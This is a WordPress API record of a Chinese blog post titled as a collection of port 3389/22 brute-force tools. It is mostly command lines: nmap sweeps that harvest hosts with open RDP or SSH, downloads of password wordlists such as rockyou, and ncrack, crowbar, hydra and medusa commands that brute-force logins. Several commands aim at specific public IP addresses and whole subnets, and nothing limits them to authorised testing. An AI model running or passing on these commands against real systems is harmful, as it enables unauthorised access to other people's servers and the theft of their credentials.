{"id":990,"date":"2021-02-27T20:34:27","date_gmt":"2021-02-27T12:34:27","guid":{"rendered":"https:\/\/byy3.com\/?p=990"},"modified":"2021-04-27T00:36:43","modified_gmt":"2021-04-26T16:36:43","slug":"3389%e7%ab%af%e5%8f%a3%e7%88%86%e7%a0%b4%e5%b7%a5%e5%85%b7%e9%9b%86%e5%90%88","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=990","title":{"rendered":"3389\u7aef\u53e3\/22\u7aef\u53e3\u7206\u7834\u5de5\u5177\u96c6\u5408"},"content":{"rendered":"<p>h\u626b\u63cf nmap -sT -p22 192.168.1.1\/24 -o ip22.txt<br \/>\n\u5bc6\u7801\u672c<br \/>\n<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/danielmiessler\/SecLists\/blob\/master\/Passwords\/Common-Credentials\/worst-passwords-2017-top100-slashdata.txt\" rel=\"nofollow\" >https:\/\/github.com\/danielmiessler\/SecLists\/blob\/master\/Passwords\/Common-Credentials\/worst-passwords-2017-top100-slashdata.txt<\/a> 100\u4e2a\u5bc6\u7801<br \/>\n<a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/danielmiessler\/SecLists\/raw\/master\/Passwords\/Common-Credentials\/10-million-password-list-top-1000000.txt\" rel=\"nofollow\" >https:\/\/github.com\/danielmiessler\/SecLists\/raw\/master\/Passwords\/Common-Credentials\/10-million-password-list-top-1000000.txt<\/a> 100\u4e07\u5bc6\u7801<br \/>\nkali\u81ea\u5e2650M\u7684rockyou.txt\u5b57\u5178<br \/>\nwget <a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/mishrasunny174\/WordLists\/raw\/master\/rockyou.tar.gz\" rel=\"nofollow\" >https:\/\/github.com\/mishrasunny174\/WordLists\/raw\/master\/rockyou.tar.gz<\/a><\/p>\n<p>\u5de5\u5177\u96c6\u5408<br \/>\nWordlist based bruteforce<br \/>\n<strong>\u4e00\uff0capt-get install ncrack<\/strong><br \/>\nNCRACK<br \/>\nncrack -vv --user\/-U &lt;username\/username_wordlist&gt; --pass\/-P &lt;password\/password_wordlist&gt; :3389<\/p>\n<p>ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389<\/p>\n<p><strong>\u4e8c\uff0capt-get install crowbar<\/strong><br \/>\n\u6216# git clone <a href=\"https:\/\/byy3.com\/go\/?url=https:\/\/github.com\/galkan\/crowbar\" rel=\"nofollow\" >https:\/\/github.com\/galkan\/crowbar<\/a><\/p>\n<h1>cd crowbar\/<\/h1>\n<h1>pip3 install -r requirements.txt<\/h1>\n<p>.\/crowbar.py --server 116.90.87.230\/32 -b rdp -u administrator -C #\u9488\u5bf9\u6307\u5b9aip \/usr\/share\/nmap\/nselib\/data\/passwords.lst<br \/>\n\u8fd9\u91cc\u6ce8\u610frockyou.txt\u4e0d\u652f\u6301utf-8\u683c\u5f0f\u5b57\u5178\u53ea\u652f\u6301.lst\u5b57\u5178<br \/>\nCrowbar<br \/>\ncrowbar -b rdp &lt;-u\/-U user\/user_wordlist&gt; -c\/-C &lt;password\/password_wordlist&gt; -s \/32 -v<br \/>\n.\/crowbar.py -b rdp -u user -C password_wordlist -S iplist3389.txt -v<br \/>\n\u5bf9\u6574\u4e2aiplist3389\u5217\u8868\u8fdb\u884c\u66b4\u529b\u7834\u89e3\uff0c\u6ce8\u610fip\u683c\u5f0fip\/32<br \/>\ncrowbar -b rdp -u user -C password_wordlist -s 192.168.0.16\/24 -v<br \/>\n\u4e0a\u9762\u9488\u5bf9\u4e00\u4e2a\u7f51\u6bb5<br \/>\n.\/crowbar.py --server 116.90.87.241\/32 -b rdp -u administrator -C \/usr\/share\/nmap\/nselib\/data\/passwords.lst<br \/>\n<strong>\u63a8\u8350<\/strong><br \/>\n<strong>\u4e09\uff0chydra<\/strong> apt-get install hydra<\/p>\n<p>hydra 123.57.173.87 rdp -L users.txt -P pass.txt -V<br \/>\n\u6279\u91cf\u7206\u7834\u547d\u4ee4<br \/>\nhydra -M target.txt rdp -L userlist.txt -P passwordlist.txt -V<\/p>\n<p>nmap -sT -p 3389 --open 192.90.81.0\/24 -oG - | awk '$4==\"Ports:\"{print $2}' &gt; ip3389_82.txt<br \/>\n\u628a\u6240\u670980\u7aef\u53e3\u5f00\u53d1\u7684\u670d\u52a1\u5668ip\u4fdd\u5b58\u5230output.txt<br \/>\n\u4f7f\u7528shell\u811a\u672c\u8fdb\u884cC\u6bb5ip\u6279\u91cf \u6ce8\u610f\u683c\u5f0fdos2unix<br \/>\n\u518d\u6b21\u4ee3\u7801<code>nmap -sT -p 3389 -open 192.90.81.0\/24 -oG - | awk '$4==\"Ports:\"{print $2}' &gt;&gt; ip3389_83.txt<\/code><br \/>\n\u91c7\u7528&gt;&gt;\u8ffd\u52a0\u65b9\u5f0f\u5199\u5165ip3389_83.txt<br \/>\n\u6279\u91cf\u4fdd\u5b58save.log<br \/>\nhydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh<\/p>\n<p>hydra -l administrator -P \/usr\/share\/wordlists\/rockyou.txt -t 1 -vV -e ns -o save.log 178.62.118.98 rdp<br \/>\n\u56db\uff0cmedusa<br \/>\nmedusa -M ssh -h 192.168.157.131 -u root -P passwd.txt<\/p>\n","protected":false},"excerpt":{"rendered":"<p>h\u626b\u63cf nmap -sT -p22 192.168.1.1\/24 -o ip22.txt \u5bc6\u7801\u672c https: [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[551,550,549,258,523,522,524,602,247],"class_list":["post-990","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-551","tag-550","tag-549","tag-258","tag-523","tag-522","tag-524","tag-crowbar","tag-hydra"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=990"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/990\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=990"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=990"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}